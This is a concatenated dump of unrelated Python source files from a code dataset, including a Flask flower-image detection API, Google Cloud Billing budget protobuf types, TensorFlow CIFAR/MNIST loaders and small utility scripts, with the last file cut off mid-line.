imageFile.save(savePath2 + secure_filename(f))\r\n\r\n # 이미지 디텍션 실행\r\n detect.run()\r\n # with open(savePath + secure_filename(f), 'rb') as ff:\r\n # fileRead = ff.read()\r\n # img = Image.open(io.BytesIO(fileRead))\r\n # results = model(img, size=640) # reduce size=320 for faster inference\r\n res = model(savePath + secure_filename(f), size=640)\r\n #img.save(savePath2 + secure_filename(f))\r\n\r\n # except Exception as e:\r\n # print('Exception',e)\r\n\r\n result_list = []\r\n resdata = res.pandas().xyxy[0]\r\n json_data = pd.DataFrame(resdata, columns=[\"class\"])\r\n\r\n for i in range(0, len(json_data)):\r\n result_list.append(json_data.values[i][0])\r\n\r\n # 중복 제거\r\n result_list = set(result_list)\r\n result_list = list(result_list)\r\n\r\n print(result_list)\r\n\r\n dict={0:'거베라_거베라',\r\n 1: '국화_코스모스',\r\n 2: '국화_디스버드',\r\n 3: '국화_백선',\r\n 4: '튤립_레드',\r\n 5: '튤립_로얄버진',\r\n 6: '백합_메두사',\r\n 7: '백합_시베리아',\r\n 8: '수국_그린',\r\n 9: '수국_핑크',\r\n 10: '데이지_데이지',\r\n 11: '데이지_겹',\r\n 12: '용담_용담',\r\n 13: '장미_푸에고',\r\n 14: '장미_하젤',\r\n 15: '카네이션_핑크',\r\n 16: '카네이션_레드(스프레이)',\r\n 17: '안개_오버타임',\r\n 18: '해바라기_겹',\r\n 19: '해바라기_해바라기',\r\n 20: 'out_of_distribution'}\r\n\r\n flower_list = []\r\n for i in range(0,len(result_list)):\r\n flower_list.append(dict[result_list[i]])\r\n print(flower_list)\r\n return jsonify(flower_list)\r\n\r\n\r\n@analyzed.route(\"/analyse_result\", methods=[\"GET\"])\r\ndef analyse_image():\r\n # 꽃 품목_품종 가져오기\r\n fl_name = request.args.get(\"flower_name\")\r\n print(fl_name)\r\n\r\n #문자열 스플릿\r\n fl_item, fl_type = str(fl_name).split('_')\r\n\r\n flist = Target(fl_item, fl_type)\r\n db.session.add(flist)\r\n db.session.commit()\r\n print(flist.fl_item, flist.fl_type)\r\n\r\n # 딕셔너리에 담아서 json 형태로 변환하여 전송\r\n flower_dict = []\r\n\r\n today = datetime.datetime.today().strftime(\"%Y-%m-%d\")\r\n fcost = db.session.query(Flower.poomname, Flower.goodname, Flower.lvname, func.sum(Flower.qty).label('qty'),\r\n func.avg(Flower.cost).label('cost'), Flower.dateinfo). \\\r\n filter(Flower.poomname == flist.fl_item, Flower.goodname == flist.fl_type). \\\r\n filter(Flower.dateinfo >= func.ADDDATE(today, -7)). \\\r\n group_by(Flower.lvname).all()\r\n\r\n assert isinstance(fcost, object)\r\n for f in fcost:\r\n flower_dict.append({\r\n \"poomname\": f.poomname,\r\n \"goodname\": f.goodname,\r\n \"lvname\": f.lvname,\r\n \"cost\": int(f.cost),\r\n \"qty\": int(f.qty),\r\n \"dateinfo\": str(f.dateinfo)\r\n })\r\n print(flower_dict)\r\n\r\n return jsonify(flower_dict)","sub_path":"analyze_api.py","file_name":"analyze_api.py","file_ext":"py","file_size_in_byte":7670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"310230143","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.index, name='home'),\n path('search', views.search, name='search'),\n path('search_by_tag/', views.search_by_tag, name='search_by_tag'),\n path('terms_of_use', views.terms_of_use, name='terms_of_use'),\n path('license_agreements', views.license_agreements, name='license_agreements'),\n]\n","sub_path":"home/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"597087472","text":"import subprocess\nimport os\nimport time\n\n\ndef wait_for_jobs(user, max_wait_time=None):\n t_start = time.time()\n while True:\n time.sleep(5)\n n_running = subprocess.check_output(['bjobs | grep %s | wc -l' % user], shell=True).decode()\n n_running = int(n_running.strip('\\n'))\n if n_running == 0:\n break\n if max_wait_time is not None:\n t_wait = time.time() - t_start\n if t_wait > max_wait_time:\n print(\"MAX WAIT TIME EXCEEDED\")\n break\n\n\ndef wait_and_check_multiple_jobs(job_prefix, n_jobs, user='papec'):\n\n success_marker = 'Success'\n wait_for_jobs(user)\n\n jobs_failed = []\n for job_id in range(n_jobs):\n log_file = './logs/log_%s_%i.log' % (job_prefix, job_id)\n\n have_log = os.path.exists(log_file)\n if not have_log:\n jobs_failed.append(job_id)\n continue\n\n with open(log_file, 'r') as f:\n out = f.readline()\n have_success = out[:len(success_marker)] == success_marker\n if not have_success:\n jobs_failed.append(job_id)\n continue\n\n return jobs_failed\n\n\ndef wait_and_check_single_job(job_name, user='papec'):\n\n success_marker = 'Success'\n wait_for_jobs(user)\n\n log_file = './logs/log_%s.log' % job_name\n\n job_failed = False\n have_log = os.path.exists(log_file)\n if not have_log:\n job_failed = True\n\n with open(log_file, 'r') as f:\n out = f.readline()\n have_success = out[:len(success_marker)] == success_marker\n if not have_success:\n job_failed = True\n\n return job_failed\n\n\ndef wait_and_check_multiple_jobnames(job_names, user='papec'):\n\n success_marker = 'Success'\n wait_for_jobs(user)\n\n jobs_failed = []\n for job_name in job_names:\n log_file = './logs/log_%s.log' % job_name\n\n have_log = os.path.exists(log_file)\n if not have_log:\n jobs_failed.append(job_name)\n continue\n\n with open(log_file, 'r') as f:\n out = f.readline()\n have_success = out[:len(success_marker)] == success_marker\n if not have_success:\n jobs_failed.append(job_name)\n continue\n\n return jobs_failed\n","sub_path":"deprecated/cluster_tools/wait_and_check.py","file_name":"wait_and_check.py","file_ext":"py","file_size_in_byte":2253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"561888106","text":"from typing import Iterable\nfrom collections import Counter\n\n\nclass Classifier:\n def __init__(self):\n self.contains_doubles = []\n self.contains_triples = []\n\n def add_id(self, id_: str):\n counter = Counter()\n\n for letter in id_:\n counter[letter] += 1\n\n if any(count == 2 for _, count in counter.items()):\n self.contains_doubles.append(id_)\n\n if any(count == 3 for _, count in counter.items()):\n self.contains_triples.append(id_)\n\n\ndef classify_ids(ids: Iterable) -> Classifier:\n classifier = Classifier()\n for id_ in ids:\n classifier.add_id(id_)\n return classifier\n\n\nif __name__ == '__main__':\n with open('data/2.txt', 'r') as file:\n classifier = classify_ids([x.strip() for x in file.readlines()])\n\n print((\n \" Doubles: {}\\n\"\n \" Triples: {}\\n\"\n \"Checksum (d * t): {}\"\n ).format(\n len(classifier.contains_doubles),\n len(classifier.contains_triples),\n len(classifier.contains_doubles) * len(classifier.contains_triples)\n ))\n","sub_path":"d2_1.py","file_name":"d2_1.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"409105170","text":"# -*- coding: utf-8 -*-\n# Copyright 2023 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\nfrom __future__ import annotations\n\nfrom typing import MutableMapping, MutableSequence\n\nfrom google.protobuf import struct_pb2 # type: ignore\nfrom google.type import date_pb2 # type: ignore\nfrom google.type import money_pb2 # type: ignore\nimport proto # type: ignore\n\n__protobuf__ = proto.module(\n package=\"google.cloud.billing.budgets.v1beta1\",\n manifest={\n \"CalendarPeriod\",\n \"Budget\",\n \"BudgetAmount\",\n \"LastPeriodAmount\",\n \"ThresholdRule\",\n \"AllUpdatesRule\",\n \"Filter\",\n \"CustomPeriod\",\n },\n)\n\n\nclass CalendarPeriod(proto.Enum):\n r\"\"\"A ``CalendarPeriod`` represents the abstract concept of a time\n period that has a canonical start. Grammatically, \"the start of the\n current ``CalendarPeriod``\". All calendar times begin at 12 AM US\n and Canadian Pacific Time (UTC-8).\n\n Values:\n CALENDAR_PERIOD_UNSPECIFIED (0):\n Calendar period is unset. This is the default\n if the budget is for a custom time period\n (CustomPeriod).\n MONTH (1):\n A month. Month starts on the first day of\n each month, such as January 1, February 1, March\n 1, and so on.\n QUARTER (2):\n A quarter. Quarters start on dates January 1,\n April 1, July 1, and October 1 of each year.\n YEAR (3):\n A year. Year starts on January 1.\n \"\"\"\n CALENDAR_PERIOD_UNSPECIFIED = 0\n MONTH = 1\n QUARTER = 2\n YEAR = 3\n\n\nclass Budget(proto.Message):\n r\"\"\"A budget is a plan that describes what you expect to spend on\n Cloud projects, plus the rules to execute as spend is tracked\n against that plan, (for example, send an alert when 90% of the\n target spend is met). The budget time period is configurable,\n with options such as month (default), quarter, year, or custom\n time period.\n\n Attributes:\n name (str):\n Output only. Resource name of the budget. The resource name\n implies the scope of a budget. Values are of the form\n ``billingAccounts/{billingAccountId}/budgets/{budgetId}``.\n display_name (str):\n User data for display name in UI.\n Validation: <= 60 chars.\n budget_filter (google.cloud.billing.budgets_v1beta1.types.Filter):\n Optional. Filters that define which resources\n are used to compute the actual spend against the\n budget amount, such as projects, services, and\n the budget's time period, as well as other\n filters.\n amount (google.cloud.billing.budgets_v1beta1.types.BudgetAmount):\n Required. Budgeted amount.\n threshold_rules (MutableSequence[google.cloud.billing.budgets_v1beta1.types.ThresholdRule]):\n Optional. Rules that trigger alerts (notifications of\n thresholds being crossed) when spend exceeds the specified\n percentages of the budget.\n\n Optional for ``pubsubTopic`` notifications.\n\n Required if using email notifications.\n all_updates_rule (google.cloud.billing.budgets_v1beta1.types.AllUpdatesRule):\n Optional. Rules to apply to notifications\n sent based on budget spend and thresholds.\n etag (str):\n Optional. Etag to validate that the object is\n unchanged for a read-modify-write operation.\n An empty etag will cause an update to overwrite\n other changes.\n \"\"\"\n\n name: str = proto.Field(\n proto.STRING,\n number=1,\n )\n display_name: str = proto.Field(\n proto.STRING,\n number=2,\n )\n budget_filter: \"Filter\" = proto.Field(\n proto.MESSAGE,\n number=3,\n message=\"Filter\",\n )\n amount: \"BudgetAmount\" = proto.Field(\n proto.MESSAGE,\n number=4,\n message=\"BudgetAmount\",\n )\n threshold_rules: MutableSequence[\"ThresholdRule\"] = proto.RepeatedField(\n proto.MESSAGE,\n number=5,\n message=\"ThresholdRule\",\n )\n all_updates_rule: \"AllUpdatesRule\" = proto.Field(\n proto.MESSAGE,\n number=6,\n message=\"AllUpdatesRule\",\n )\n etag: str = proto.Field(\n proto.STRING,\n number=7,\n )\n\n\nclass BudgetAmount(proto.Message):\n r\"\"\"The budgeted amount for each usage period.\n\n This message has `oneof`_ fields (mutually exclusive fields).\n For each oneof, at most one member field can be set at the same time.\n Setting any member of the oneof automatically clears all other\n members.\n\n .. _oneof: https://proto-plus-python.readthedocs.io/en/stable/fields.html#oneofs-mutually-exclusive-fields\n\n Attributes:\n specified_amount (google.type.money_pb2.Money):\n A specified amount to use as the budget. ``currency_code``\n is optional. If specified when creating a budget, it must\n match the currency of the billing account. If specified when\n updating a budget, it must match the currency_code of the\n existing budget. The ``currency_code`` is provided on\n output.\n\n This field is a member of `oneof`_ ``budget_amount``.\n last_period_amount (google.cloud.billing.budgets_v1beta1.types.LastPeriodAmount):\n Use the last period's actual spend as the budget for the\n present period. LastPeriodAmount can only be set when the\n budget's time period is a\n [Filter.calendar_period][google.cloud.billing.budgets.v1beta1.Filter.calendar_period].\n It cannot be set in combination with\n [Filter.custom_period][google.cloud.billing.budgets.v1beta1.Filter.custom_period].\n\n This field is a member of `oneof`_ ``budget_amount``.\n \"\"\"\n\n specified_amount: money_pb2.Money = proto.Field(\n proto.MESSAGE,\n number=1,\n oneof=\"budget_amount\",\n message=money_pb2.Money,\n )\n last_period_amount: \"LastPeriodAmount\" = proto.Field(\n proto.MESSAGE,\n number=2,\n oneof=\"budget_amount\",\n message=\"LastPeriodAmount\",\n )\n\n\nclass LastPeriodAmount(proto.Message):\n r\"\"\"Describes a budget amount targeted to the last\n [Filter.calendar_period][google.cloud.billing.budgets.v1beta1.Filter.calendar_period]\n spend. At this time, the amount is automatically 100% of the last\n calendar period's spend; that is, there are no other options yet.\n Future configuration options will be described here (for example,\n configuring a percentage of last period's spend). LastPeriodAmount\n cannot be set for a budget configured with a\n [Filter.custom_period][google.cloud.billing.budgets.v1beta1.Filter.custom_period].\n\n \"\"\"\n\n\nclass ThresholdRule(proto.Message):\n r\"\"\"ThresholdRule contains the definition of a threshold. Threshold\n rules define the triggering events used to generate a budget\n notification email. When a threshold is crossed (spend exceeds the\n specified percentages of the budget), budget alert emails are sent\n to the email recipients you specify in the\n `NotificationsRule <#notificationsrule>`__.\n\n Threshold rules also affect the fields included in the `JSON data\n object `__\n sent to a Pub/Sub topic.\n\n Threshold rules are *required* if using email notifications.\n\n Threshold rules are *optional* if only setting a ```pubsubTopic``\n NotificationsRule <#NotificationsRule>`__, unless you want your JSON\n data object to include data about the thresholds you set.\n\n For more information, see `set budget threshold rules and\n actions `__.\n\n Attributes:\n threshold_percent (float):\n Required. Send an alert when this threshold\n is exceeded. This is a 1.0-based percentage, so\n 0.5 = 50%. Validation: non-negative number.\n spend_basis (google.cloud.billing.budgets_v1beta1.types.ThresholdRule.Basis):\n Optional. The type of basis used to determine if spend has\n passed the threshold. Behavior defaults to CURRENT_SPEND if\n not set.\n \"\"\"\n\n class Basis(proto.Enum):\n r\"\"\"The type of basis used to determine if spend has passed the\n threshold.\n\n Values:\n BASIS_UNSPECIFIED (0):\n Unspecified threshold basis.\n CURRENT_SPEND (1):\n Use current spend as the basis for comparison\n against the threshold.\n FORECASTED_SPEND (2):\n Use forecasted spend for the period as the basis for\n comparison against the threshold. FORECASTED_SPEND can only\n be set when the budget's time period is a\n [Filter.calendar_period][google.cloud.billing.budgets.v1beta1.Filter.calendar_period].\n It cannot be set in combination with\n [Filter.custom_period][google.cloud.billing.budgets.v1beta1.Filter.custom_period].\n \"\"\"\n BASIS_UNSPECIFIED = 0\n CURRENT_SPEND = 1\n FORECASTED_SPEND = 2\n\n threshold_percent: float = proto.Field(\n proto.DOUBLE,\n number=1,\n )\n spend_basis: Basis = proto.Field(\n proto.ENUM,\n number=2,\n enum=Basis,\n )\n\n\nclass AllUpdatesRule(proto.Message):\n r\"\"\"AllUpdatesRule defines notifications that are sent based on\n budget spend and thresholds.\n\n Attributes:\n pubsub_topic (str):\n Optional. The name of the Pub/Sub topic where budget related\n messages will be published, in the form\n ``projects/{project_id}/topics/{topic_id}``. Updates are\n sent at regular intervals to the topic. The topic needs to\n be created before the budget is created; see\n https://cloud.google.com/billing/docs/how-to/budgets-programmatic-notifications\n for more details. Caller is expected to have\n ``pubsub.topics.setIamPolicy`` permission on the topic when\n it's set for a budget, otherwise, the API call will fail\n with PERMISSION_DENIED. See\n https://cloud.google.com/billing/docs/how-to/budgets-programmatic-notifications#permissions_required_for_this_task\n for more details on Pub/Sub roles and permissions.\n schema_version (str):\n Optional. Required when\n [AllUpdatesRule.pubsub_topic][google.cloud.billing.budgets.v1beta1.AllUpdatesRule.pubsub_topic]\n is set. The schema version of the notification sent to\n [AllUpdatesRule.pubsub_topic][google.cloud.billing.budgets.v1beta1.AllUpdatesRule.pubsub_topic].\n Only \"1.0\" is accepted. It represents the JSON schema as\n defined in\n https://cloud.google.com/billing/docs/how-to/budgets-programmatic-notifications#notification_format.\n monitoring_notification_channels (MutableSequence[str]):\n Optional. Targets to send notifications to when a threshold\n is exceeded. This is in addition to default recipients who\n have billing account IAM roles. The value is the full REST\n resource name of a monitoring notification channel with the\n form\n ``projects/{project_id}/notificationChannels/{channel_id}``.\n A maximum of 5 channels are allowed. See\n https://cloud.google.com/billing/docs/how-to/budgets-notification-recipients\n for more details.\n disable_default_iam_recipients (bool):\n Optional. When set to true, disables default\n notifications sent when a threshold is exceeded.\n Default notifications are sent to those with\n Billing Account Administrator and Billing\n Account User IAM roles for the target account.\n enable_project_level_recipients (bool):\n Optional. When set to true, and when the budget has a single\n project configured, notifications will be sent to project\n level recipients of that project. This field will be ignored\n if the budget has multiple or no project configured.\n\n Currently, project level recipients are the users with\n ``Owner`` role on a cloud project.\n \"\"\"\n\n pubsub_topic: str = proto.Field(\n proto.STRING,\n number=1,\n )\n schema_version: str = proto.Field(\n proto.STRING,\n number=2,\n )\n monitoring_notification_channels: MutableSequence[str] = proto.RepeatedField(\n proto.STRING,\n number=3,\n )\n disable_default_iam_recipients: bool = proto.Field(\n proto.BOOL,\n number=4,\n )\n enable_project_level_recipients: bool = proto.Field(\n proto.BOOL,\n number=5,\n )\n\n\nclass Filter(proto.Message):\n r\"\"\"A filter for a budget, limiting the scope of the cost to\n calculate.\n\n This message has `oneof`_ fields (mutually exclusive fields).\n For each oneof, at most one member field can be set at the same time.\n Setting any member of the oneof automatically clears all other\n members.\n\n .. _oneof: https://proto-plus-python.readthedocs.io/en/stable/fields.html#oneofs-mutually-exclusive-fields\n\n Attributes:\n projects (MutableSequence[str]):\n Optional. A set of projects of the form\n ``projects/{project}``, specifying that usage from only this\n set of projects should be included in the budget. If\n omitted, the report will include all usage for the billing\n account, regardless of which project the usage occurred on.\n resource_ancestors (MutableSequence[str]):\n Optional. A set of folder and organization names of the form\n ``folders/{folderId}`` or\n ``organizations/{organizationId}``, specifying that usage\n from only this set of folders and organizations should be\n included in the budget. If omitted, the budget includes all\n usage that the billing account pays for. If the folder or\n organization contains projects that are paid for by a\n different Cloud Billing account, the budget *doesn't* apply\n to those projects.\n credit_types (MutableSequence[str]):\n Optional. If\n [Filter.credit_types_treatment][google.cloud.billing.budgets.v1beta1.Filter.credit_types_treatment]\n is INCLUDE_SPECIFIED_CREDITS, this is a list of credit types\n to be subtracted from gross cost to determine the spend for\n threshold calculations. See `a list of acceptable credit\n type\n values `__.\n\n If\n [Filter.credit_types_treatment][google.cloud.billing.budgets.v1beta1.Filter.credit_types_treatment]\n is **not** INCLUDE_SPECIFIED_CREDITS, this field must be\n empty.\n credit_types_treatment (google.cloud.billing.budgets_v1beta1.types.Filter.CreditTypesTreatment):\n Optional. If not set, default behavior is\n ``INCLUDE_ALL_CREDITS``.\n services (MutableSequence[str]):\n Optional. A set of services of the form\n ``services/{service_id}``, specifying that usage from only\n this set of services should be included in the budget. If\n omitted, the report will include usage for all the services.\n The service names are available through the Catalog API:\n https://cloud.google.com/billing/v1/how-tos/catalog-api.\n subaccounts (MutableSequence[str]):\n Optional. A set of subaccounts of the form\n ``billingAccounts/{account_id}``, specifying that usage from\n only this set of subaccounts should be included in the\n budget. If a subaccount is set to the name of the parent\n account, usage from the parent account will be included. If\n omitted, the report will include usage from the parent\n account and all subaccounts, if they exist.\n labels (MutableMapping[str, google.protobuf.struct_pb2.ListValue]):\n Optional. A single label and value pair specifying that\n usage from only this set of labeled resources should be\n included in the budget. If omitted, the report will include\n all labeled and unlabeled usage.\n\n An object containing a single ``\"key\": value`` pair.\n Example: ``{ \"name\": \"wrench\" }``.\n\n *Currently, multiple entries or multiple values per entry\n are not allowed.*\n calendar_period (google.cloud.billing.budgets_v1beta1.types.CalendarPeriod):\n Optional. Specifies to track usage for\n recurring calendar period. For example, assume\n that CalendarPeriod.QUARTER is set. The budget\n will track usage from April 1 to June 30, when\n the current calendar month is April, May, June.\n After that, it will track usage from July 1 to\n September 30 when the current calendar month is\n July, August, September, so on.\n\n This field is a member of `oneof`_ ``usage_period``.\n custom_period (google.cloud.billing.budgets_v1beta1.types.CustomPeriod):\n Optional. Specifies to track usage from any\n start date (required) to any end date\n (optional). This time period is static, it does\n not recur.\n\n This field is a member of `oneof`_ ``usage_period``.\n \"\"\"\n\n class CreditTypesTreatment(proto.Enum):\n r\"\"\"Specifies how credits are applied when determining the spend for\n threshold calculations. Budgets track the total cost minus any\n applicable selected credits. `See the documentation for a list of\n credit\n types `__.\n\n Values:\n CREDIT_TYPES_TREATMENT_UNSPECIFIED (0):\n No description available.\n INCLUDE_ALL_CREDITS (1):\n All types of credit are subtracted from the\n gross cost to determine the spend for threshold\n calculations.\n EXCLUDE_ALL_CREDITS (2):\n All types of credit are added to the net cost\n to determine the spend for threshold\n calculations.\n INCLUDE_SPECIFIED_CREDITS (3):\n `Credit\n types `__\n specified in the credit_types field are subtracted from the\n gross cost to determine the spend for threshold\n calculations.\n \"\"\"\n CREDIT_TYPES_TREATMENT_UNSPECIFIED = 0\n INCLUDE_ALL_CREDITS = 1\n EXCLUDE_ALL_CREDITS = 2\n INCLUDE_SPECIFIED_CREDITS = 3\n\n projects: MutableSequence[str] = proto.RepeatedField(\n proto.STRING,\n number=1,\n )\n resource_ancestors: MutableSequence[str] = proto.RepeatedField(\n proto.STRING,\n number=2,\n )\n credit_types: MutableSequence[str] = proto.RepeatedField(\n proto.STRING,\n number=7,\n )\n credit_types_treatment: CreditTypesTreatment = proto.Field(\n proto.ENUM,\n number=4,\n enum=CreditTypesTreatment,\n )\n services: MutableSequence[str] = proto.RepeatedField(\n proto.STRING,\n number=3,\n )\n subaccounts: MutableSequence[str] = proto.RepeatedField(\n proto.STRING,\n number=5,\n )\n labels: MutableMapping[str, struct_pb2.ListValue] = proto.MapField(\n proto.STRING,\n proto.MESSAGE,\n number=6,\n message=struct_pb2.ListValue,\n )\n calendar_period: \"CalendarPeriod\" = proto.Field(\n proto.ENUM,\n number=8,\n oneof=\"usage_period\",\n enum=\"CalendarPeriod\",\n )\n custom_period: \"CustomPeriod\" = proto.Field(\n proto.MESSAGE,\n number=9,\n oneof=\"usage_period\",\n message=\"CustomPeriod\",\n )\n\n\nclass CustomPeriod(proto.Message):\n r\"\"\"All date times begin at 12 AM US and Canadian Pacific Time\n (UTC-8).\n\n Attributes:\n start_date (google.type.date_pb2.Date):\n Required. The start date must be after\n January 1, 2017.\n end_date (google.type.date_pb2.Date):\n Optional. The end date of the time period. Budgets with\n elapsed end date won't be processed. If unset, specifies to\n track all usage incurred since the start_date.\n \"\"\"\n\n start_date: date_pb2.Date = proto.Field(\n proto.MESSAGE,\n number=1,\n message=date_pb2.Date,\n )\n end_date: date_pb2.Date = proto.Field(\n proto.MESSAGE,\n number=2,\n message=date_pb2.Date,\n )\n\n\n__all__ = tuple(sorted(__protobuf__.manifest))\n","sub_path":"packages/google-cloud-billing-budgets/google/cloud/billing/budgets_v1beta1/types/budget_model.py","file_name":"budget_model.py","file_ext":"py","file_size_in_byte":21649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"327300230","text":"\"\"\"\n\n@Author:jyang\n@Date:5/24/2019\n\"\"\"\nfrom docx import Document\nfrom docx.oxml.ns import qn\n\nfile = Document()\nfile.styles['Normal'].font.name=u'微软雅黑'\nfile.styles['Normal']._element.rPr.rFonts.set(qn('w:eastAsia'), u'微软雅黑')\n\ntransfer_file = '../../Day011/code/CNDaily_20190529.txt'\nwith open(transfer_file, 'r', encoding='utf-8') as f:\n file.add_paragraph(f.read().strip())\n\nfile.save(transfer_file[:transfer_file.rindex('.')+1] + 'docx')","sub_path":"Day01-15/Day015/code/word_write.py","file_name":"word_write.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"504975302","text":"import tensorflow as tf\nimport tensorflow_datasets as tfds\n\n\ndef cifar(train_batch_size=128,\n valid_batch_size=512,\n padding='reflect',\n dtype=tf.float32,\n shuffle_train=20000,\n repeat_train=True,\n version=10,\n data_dir=None):\n subtract = tf.constant([0.49139968, 0.48215841, 0.44653091], dtype=dtype)\n divide = tf.constant([0.24703223, 0.24348513, 0.26158784], dtype=dtype)\n\n def train_prep(x, y):\n x = tf.cast(x, dtype) / 255.0\n x = tf.image.random_flip_left_right(x)\n x = tf.pad(x, [[4, 4], [4, 4], [0, 0]], mode=padding)\n x = tf.image.random_crop(x, (32, 32, 3))\n x = (x - subtract) / divide\n return x, y\n\n def valid_prep(x, y):\n x = tf.cast(x, dtype) / 255.0\n x = (x - subtract) / divide\n return x, y\n\n if version == 10 or version == 100:\n ds = tfds.load(name=f'cifar{version}', as_supervised=True, data_dir=data_dir)\n else:\n raise Exception(f\"version = {version}, but should be either 10 or 100!\")\n\n if repeat_train:\n ds['train'] = ds['train'].repeat()\n if shuffle_train:\n ds['train'] = ds['train'].shuffle(shuffle_train)\n ds['train'] = ds['train'].map(train_prep)\n ds['train'] = ds['train'].batch(train_batch_size)\n # ds['train'] = ds['train'].prefetch(tf.data.experimental.AUTOTUNE)\n\n ds['test'] = ds['test'].map(valid_prep)\n ds['test'] = ds['test'].batch(valid_batch_size)\n return ds\n\n\ndef mnist(train_batch_size=100,\n valid_batch_size=400,\n dtype=tf.float32,\n shuffle_train=10000,\n data_dir=None):\n def preprocess(x, y):\n x = tf.cast(x, dtype)\n x /= 255\n return x, y\n\n ds = tfds.load(name='mnist', as_supervised=True, data_dir=data_dir)\n ds['train'] = ds['train'].repeat()\n ds['train'] = ds['train'].shuffle(shuffle_train)\n ds['train'] = ds['train'].map(preprocess)\n ds['train'] = ds['train'].batch(train_batch_size)\n\n ds['test'] = ds['test'].map(preprocess)\n ds['test'] = ds['test'].batch(valid_batch_size)\n\n ds['input_shape'] = (28, 28, 1)\n ds['n_classes'] = 10\n return ds\n\n\ndef test(train_batch_size=100,\n image_shape=(32, 32, 3),\n dtype=tf.float32):\n images = tf.ones([2, *image_shape])\n target = tf.constant([0, 1])\n\n def preprocess(x, y):\n x = tf.cast(x, dtype)\n return x, y\n\n ds = dict()\n ds['train'] = tf.data.Dataset.from_tensor_slices((images, target))\n ds['train'] = ds['train'].map(preprocess).repeat().batch(train_batch_size)\n ds['test'] = tf.data.Dataset.from_tensor_slices((images, target))\n ds['test'] = ds['test'].map(preprocess).batch(2)\n return ds\n\n\ndef get_dataset_from_alias(alias, precision=32):\n assert isinstance(alias, str)\n\n if precision == 16:\n dtype = tf.float16\n elif precision == 32:\n dtype = tf.float32\n elif precision == 64:\n dtype = tf.float64\n else:\n raise NotImplementedError(f\"Unknown precision {precision}!\")\n\n if alias == 'cifar10':\n return cifar(dtype=dtype, version=10)\n elif alias == 'cifar100':\n return cifar(dtype=dtype, version=100)\n elif alias == 'mnist':\n return mnist(dtype=dtype)\n else:\n raise NotImplementedError(f\"Unknown alias {alias}\")\n\n\ndef figure_out_input_shape(ds):\n for x, y in ds['test']:\n break\n else:\n raise RuntimeError(\"Dataset is empty!\")\n return x.shape[1:]\n\n\ndef figure_out_n_classes(ds):\n classes = set()\n for x, y in ds['test']:\n classes.update(y.numpy())\n return len(classes)\n","sub_path":"modules/tf_helper/datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":3619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"532792780","text":"\n\nfrom xai.brain.wordbase.nouns._hodgepodge import _HODGEPODGE\n\n#calss header\nclass _HODGEPODGES(_HODGEPODGE, ):\n\tdef __init__(self,): \n\t\t_HODGEPODGE.__init__(self)\n\t\tself.name = \"HODGEPODGES\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"hodgepodge\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_hodgepodges.py","file_name":"_hodgepodges.py","file_ext":"py","file_size_in_byte":266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"251328660","text":"from .group import Office\n\nu = Office()\n\nMENU_OPTIONS = [\n ('Добавить устройство', u.add_device),\n ('Добавить смартфон', u.add_smartphone),\n ('Изменить данные по устройству', u.edit_list),\n ('Вывести список устройств', u.print_list),\n ('Сохранить в файл', u.save_to_file),\n ('Загрузить из файла', u.load_from_file),\n ('Удалить устройство', u.delete_from_list),\n ('��чистить всех', u.clear)\n]\n\n\ndef main():\n\n while True:\n \n print('------------------------------')\n \n for i, item in enumerate(MENU_OPTIONS, start = 1):\n print('{0}: {1}'.format(i, item[0]))\n print('0: Выход')\n\n print('------------------------------')\n\n\n try:\n choice = int(input('>> '))\n\n if choice == 0:\n break\n\n MENU_OPTIONS[choice - 1][1]()\n \n except Exception as ex:\n print(ex)\n print('Ошибка!')","sub_path":"st02/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"228472697","text":"from pypif.pif import loads, dumps\nfrom pypif.obj.system import System\nfrom pypif.obj.common.property import Property\n\n\ndef test_basic_round_robin():\n pif = System()\n pif.uid = \"foo\"\n pif2 = loads(dumps(pif))\n assert pif2.uid == pif.uid\n\n\ndef test_full_round_robin():\n pif = System()\n pif.properties = [Property(name=\"foo\", scalars=[2.4, 2.5]), Property(name=\"bar\", scalars=2.4)]\n pif2 = loads(dumps(pif))\n assert pif.properties[0].scalars[0].value == pif2.properties[0].scalars[0].value\n","sub_path":"pypif/tests/test_pif.py","file_name":"test_pif.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"120406592","text":"import numpy as np\nimport os\nimport os.path as op\nfrom scipy.io import loadmat\n\nrois = ['V1', 'V2', 'V3', 'hV4', 'IOG', 'pFus', 'mFus']\n\ndef filter_voxels(res, cutoff=50):\n # as in Kay et al., select non-noisy voxels with at least 50% variance explained\n idx = res['aggregatedtestperformance'][0] >= cutoff\n return np.median(res['params'][..., idx], axis=0)\n\nHERE = op.dirname(op.abspath(__file__))\nOUTDIR = op.join(op.dirname(HERE), 'output')\n\nparams = dict()\nfor hemi in ['L', 'R']:\n for roi in rois:\n ok_voxs = []\n for s in range(1, 4):\n res = 